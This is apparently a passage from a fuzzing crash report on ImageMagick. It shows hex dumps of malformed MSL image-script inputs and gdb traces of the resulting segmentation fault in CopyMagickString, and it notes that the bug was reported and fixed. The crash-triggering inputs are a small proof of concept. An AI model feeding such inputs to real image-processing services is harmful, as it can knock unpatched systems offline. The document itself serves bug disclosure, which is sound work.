0050  68 65 69 67 68 74 5D 20 74 6F 20 25 5B 77 69 64  |height] to %[wid|
0060  74 68 5D 78 25 5B 6D 61 67 65 2E 67 69 66 22 20  |th]x%[mage.gif" |
0070  2F 3E 3C 67 65 74 20 77 3D 22 62 61 74 22 20 2F  |/><get w="bat" /|
0080  3E 3C 72 65 73 69 7A 65 20 67 65 6F 6D 65 74 72  |><resize geometr|
0090  79 3D 22 25 5B 64 69 6D 22 20 2F 3E 3C 67 65 74  |y="%[dim" /><get|
00A0  20 77 69 64 74 68 3D 22 77 69 64 74 68 22 20 68  | width="width" h|
00B0  65 69 67 68 74 3D 22 68 65 69 67 68 74 22 20 2F  |eight="height" /|
00C0  3E 3C 70 72 69 6E 74 20 6F 75 74 70 75 74 3D 22  |><print output="|
00D0  7A 65 64 20 66 72 6F 6D 20 25 5B 62 61 73 65 2D  |zed from %[base-|
00E0  77 69 64 74 68 5D 78 25 5B 62 61 73 65 2D 68 65  |width]x%[base-he|
00F0  69 67 68 74 5D 20 74 6F 20 25 5B 77 69 64 74 68  |ight] to %[width|
0100  5D 78 25 5B 68 65 69 67 68 74 5D 2E 5C 6E 22 20  |]x%[height].\n" |
0110  2F 3E 3C 77 72 69 74 65 20 66 69 6C 65 6E 61 6D  |/><write filenam|
0120  65 3D 22 69 6D 61 67 65 2E 70 6E 67 22 20 2F 3E  |e="image.png" />|
0130  3C 2F 69 6D 61 67 65 3E 0A -- -- -- -- -- -- --  |</image>.       |

gdb output

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000004,sig:06,src:000026,op:havoc,rep:2", source=0x0, length=4096) at MagickCore/string.c:761
761	    *q=(*p++);

filename: id:000005,sig:06,src:000108,op:havoc,rep:4

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 73 69 7A  |F-8"?><image siz|
0030  65 3D 22 34 30 30 78 34 30 30 22 20 3E 3C 72 65  |e="400x400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61  |ad filename="ima|
0050  67 65 2E 67 69 66 20 66 72 6F 6D 20 25 5B 72 61  |ge.gif from %[ra|
0060  73 65 2D 77 69 64 74 68 5D 78 25 5B 62 22 20 2F  |se-width]x%[b" /|
0070  3E 3C 67 65 74 20 77 3D 22 62 61 74 22 20 2F 3E  |><get w="bat" />|
0080  3C 72 65 73 69 7A 65 20 67 65 6F 6D 65 74 72 79  |<resize geometry|
0090  3D 22 25 5B 64 69 6D 22 20 2F 3E 3C 67 65 74 20  |="%[dim" /><get |
00A0  77 69 64 74 68 3D 22 77 69 64 74 68 22 20 68 65  |width="width" he|
00B0  69 67 68 74 3D 22 68 65 69 67 68 74 22 20 2F 3E  |ight="height" />|
00C0  3C 70 72 69 6E 74 20 6F 75 74 70 75 74 3D 22 7A  |<print output="z|
00D0  65 64 20 66 72 6F 6D 20 25 5B 72 61 73 65 2D 77  |ed from %[rase-w|
00E0  69 64 74 68 5D 78 25 5B 62 61 73 65 2D 68 65 69  |idth]x%[base-hei|
00F0  67 68 74 5D 20 74 6F 20 25 5B 77 69 64 74 68 5D  |ght] to %[width]|
0100  78 25 5B 68 65 40 00 68 00 5D 2E 5C 6E 22 20 2F  |x%[he@.h.].\n" /|
0110  3E 3C 77 72 69 74 65 20 66 69 6C 65 6E 61 6D 65  |><write filename|
0120  3D 22 69 6D 61 67 65 2E 70 6E 67 22 20 2F 3E 3C  |="image.png" /><|
0130  2F 69 6D 61 67 65 3E 0A -- -- -- -- -- -- -- --  |/image>.        |

gdb output

[Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 
Program received signal SIGSEGV, Segmentation fault. 
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000005,sig:06,src:000108,op:havoc,rep:4", source=0x0, length=4096) at MagickCore/string.c:761 761 *q=(*p++);

This issue was reported to ImageMagick and fixed rather quickly @ http://www.imagemagick.org/discourse-server/viewtopic.php?f=3&t=30797